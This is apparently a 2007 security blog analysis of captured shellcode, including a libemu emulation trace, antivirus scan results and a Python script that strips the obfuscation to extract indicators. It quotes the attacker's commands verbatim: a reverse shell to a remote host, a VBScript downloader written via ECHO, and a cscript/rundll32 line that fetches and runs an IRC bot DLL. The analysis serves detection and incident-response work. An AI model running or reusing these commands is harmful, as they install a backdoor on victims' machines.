The Internet Storm Center recently published a call for packets and asked for a shellcode analysis.
We received the dump from incident handler William Salusky, and here is the libemu result:

[figure: the shellcode's call graph]
The shellcode spawns a command prompt and connects this shell to 219.150.93.35, port 10000.
The server then sends:
cd wins & ECHO SEt P=cREAtEOBjEct("micROSOFt.xmL"^&X^&"http"):P.OpEn "gEt",wScRipt.ARgUmEntS(0),0:P.SEnd():SEt S=cREAtEOBjEct("AdOdB.S"^&X^&"tREAm"):S.mOdE=3:S.tYpE=1:S.OpEn():S.wRitE(P.RESpOnSEBOdY):S.SAvEtOFiLE wScRipt.ARgUmEntS(1),2 >lite.vbe
cmd.exe /c "cscript.exe lite.vbe http://61.129.112.73/images/menu/dnz.dll dnz.dll & rundll32 dnz.dll,ShellMain"
which the attacked client executes.
Removing the obfuscation (the ^ characters are cmd.exe escapes for &, and X is never assigned, so the split strings are simply microsoft.xmlhttp and adodb.stream), the first line writes a VBScript downloader to lite.vbe; the second runs it with cscript to download 61.129.112.73/images/menu/dnz.dll, store it as dnz.dll and start it with rundll32.
The file is an IRC bot with very poor detection rates as of the VirusTotal run yesterday evening:
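As an added illustration (not part of the original post or of libemu), a Python parser that undoes the two layers of obfuscation in the commands above: the cmd.exe caret escapes and the VBScript string splitting. It assumes, as the capture shows, that X is never assigned and therefore Empty, and pulls out the COM ProgIDs, the download URL and the rundll32 target, which are the pieces a detection signature or triage note needs.

```python
import re

# Constructed from the two command lines the server sent in the capture above.
SERVER_LINES = [
    'cd wins & ECHO SEt P=cREAtEOBjEct("micROSOFt.xmL"^&X^&"http"):P.OpEn "gEt",'
    'wScRipt.ARgUmEntS(0),0:P.SEnd():SEt S=cREAtEOBjEct("AdOdB.S"^&X^&"tREAm"):'
    'S.mOdE=3:S.tYpE=1:S.OpEn():S.wRitE(P.RESpOnSEBOdY):S.SAvEtOFiLE wScRipt.ARgUmEntS(1),2 >lite.vbe',
    'cmd.exe /c "cscript.exe lite.vbe http://61.129.112.73/images/menu/dnz.dll dnz.dll & rundll32 dnz.dll,ShellMain"',
]

def unescape_cmd(s: str) -> str:
    """Drop cmd.exe caret escapes: ^& is a literal & once cmd has parsed the line."""
    return re.sub(r'\^(.)', r'\1', s)

def extract_echoed_script(line: str):
    """Return (script_text, target_file) from an 'ECHO <text> ><file>' redirection."""
    m = re.search(r'\bECHO\s+(.*?)\s*>\s*(\S+)\s*$', unescape_cmd(line), re.I)
    return (m.group(1), m.group(2)) if m else (None, None)

def fold_concat(script: str) -> str:
    """Join "a"&X&"b" into "ab"; X is unassigned, hence Empty (assumption from the capture)."""
    pat = re.compile(r'"([^"]*)"\s*&\s*[A-Za-z_]\w*\s*&\s*"([^"]*)"')
    prev = None
    while prev != script:          # repeat until no split string is left
        prev, script = script, pat.sub(r'"\1\2"', script)
    return script

def progids(script: str) -> list:
    """COM ProgIDs handed to CreateObject, case-folded (ProgIDs are case-insensitive)."""
    return [p.lower() for p in re.findall(r'createobject\("([^"]+)"\)', script, re.I)]

def download_args(line: str):
    """(script, url, local_name) passed to cscript, plus the (dll, export) given to rundll32."""
    line = unescape_cmd(line)
    cs = re.search(r'cscript(?:\.exe)?\s+(\S+)\s+(\S+)\s+(\S+)', line, re.I)
    rd = re.search(r'rundll32\s+([^\s,]+),([^\s"]+)', line, re.I)
    return cs.groups() if cs else None, rd.groups() if rd else None

def analyse(lines):
    """Summarise what the two-stage command does, for an IDS signature or a triage note."""
    script, vbs_file = extract_echoed_script(lines[0])
    (_, url, saved_as), loader = download_args(lines[1])
    return {"vbs_file": vbs_file, "progids": progids(fold_concat(script)),
            "url": url, "saved_as": saved_as, "loader": loader}

if __name__ == "__main__":
    print(analyse(SERVER_LINES))
```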
File dnz.dll received on 08.23.2007 21:05:21 (CET)
Result: 4/32 (12.5%)
| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| AhnLab-V3 | 2007.8.22.0 | 2007.08.23 | - |
| AntiVir | 7.4.1.63 | 2007.08.23 | - |
| Authentium | 4.93.8 | 2007.08.23 | - |
| Avast | 4.7.1029.0 | 2007.08.23 | - |
| AVG | 7.5.0.484 | 2007.08.23 | BackDoor.Ircbot.BAO |
| BitDefender | 7.2 | 2007.08.23 | - |
| CAT-QuickHeal | 9.00 | 2007.08.23 | - |
| ClamAV | 0.91 | 2007.08.23 | - |
| DrWeb | 4.33 | 2007.08.23 | - |
| eSafe | 7.0.15.0 | 2007.08.23 | - |
| eTrust-Vet | 31.1.5082 | 2007.08.23 | - |
| Ewido | 4.0 | 2007.08.23 | - |
| FileAdvisor | 1 | 2007.08.23 | - |
| Fortinet | 2.91.0.0 | 2007.08.23 | - |
| F-Prot | 4.3.2.48 | 2007.08.23 | - |
| F-Secure | 6.70.13030.0 | 2007.08.23 | - |
| Ikarus T | 3.1.1.12 | 2007.08.23 | - |
| Kaspersky | 4.0.2.24 | 2007.08.23 | - |
| McAfee | 5104 | 2007.08.23 | - |
| Microsoft | 1.2803 | 2007.08.23 | - |
| NOD32v2 | 2480 | 2007.08.23 | probably a variant of Win32/IRCBot |
| Norman | 5.80.02 | 2007.08.23 | - |
| Panda | 9.0.0.4 | 2007.08.23 | - |
| Prevx1 | V2 | 2007.08.23 | - |
| Rising | 19.37.32.00 | 2007.08.23 | - |
| Sophos | 4.20.0 | 2007.08.23 | - |
| Sunbelt | 2.2.907.0 | 2007.08.23 | - |
| Symantec | 10 | 2007.08.23 | - |
| TheHacker | 6.1.8.172 | 2007.08.23 | - |
| VBA32 | 3.12.2.3 | 2007.08.23 | suspected of Backdoor.xBot.3 |
| VirusBuster | 4.3.26:9 | 2007.08.23 | - |
| Webwasher-Gateway | 6.0.1 | 2007.08.23 | Win32.Malware.gen!92 (suspicious) |
Additional information
File size: 24064 bytes
MD5: 60cad46ccc51fefbadd1d0874c1c26d2
SHA1: 1db02d6916122cc3065b86786c2a25a5eebd1af3
Apply patches in time, always.
For completeness, here are the details:
cat session_8016.5168.raw2 | /opt/libemu/bin/sctest -S -g -s 100000000 -G dox.dot
graph file dox.dot
success
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:661
emu_env_w32_hook_LoadLibrayA
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:517
emu_env_w32_hook_WSAStartup
WSAStartup version 2
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:461
emu_env_w32_hook_WSASocketA
SOCKET WSASocket(af=2, type=1, protocol=0, lpProtocolInfo=0, group=0,
dwFlags=0);
socket 3
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:182
emu_env_w32_hook_connect
host 219.150.93.35 port 10000
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:134
emu_env_w32_hook_CreateProcessA
CreateProcessA
CreateProcess(pszImageName=0, pszCmdLine=22cc80, psaProcess=0,
psaThread=0, fInheritHandles=1, fdwCreate=0, pvEnvironment=0,
pszCurDir=0, psiStartInfo=22cc2c, pProcInfo=22cc70)
PROCESS_INFORMATION
{
HANDLE hProcess=4711;
HANDLE hThread=4712;
DWORD dwProcessId=4713;
DWORD dwThreadId=4714;
}
STARTUPINFO {
DWORD cb=68;
LPTSTR lpReserved=0x00000000;
LPTSTR lpDesktop=0x00000000;
LPTSTR lpTitle=0x00000000;
DWORD dwX=0;
DWORD dwY=0;
DWORD dwXSize=0;
DWORD dwYSize=0;
DWORD dwXCountChars=0;
DWORD dwYCountChars=0;
DWORD dwFillAttribute=0;
DWORD dwFlags=257;
WORD wShowWindow=0;
WORD cbReserved2=0;
LPBYTE lpReserved2=0x080;
HANDLE hStdInput=3;
HANDLE hStdOutput=3;
HANDLE hStdError=3;
}
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:815
emu_env_w32_hook_WaitForSingleObject
WaitForSingleObject(hHandle=17920, dwMilliseconds=-1)
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:152
emu_env_w32_hook_closesocket
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:789
emu_env_w32_hook_SetUnhandledExceptionFilter
Exception filter 7c800000
cpu error error accessing 0x7c81cdc7 not mapped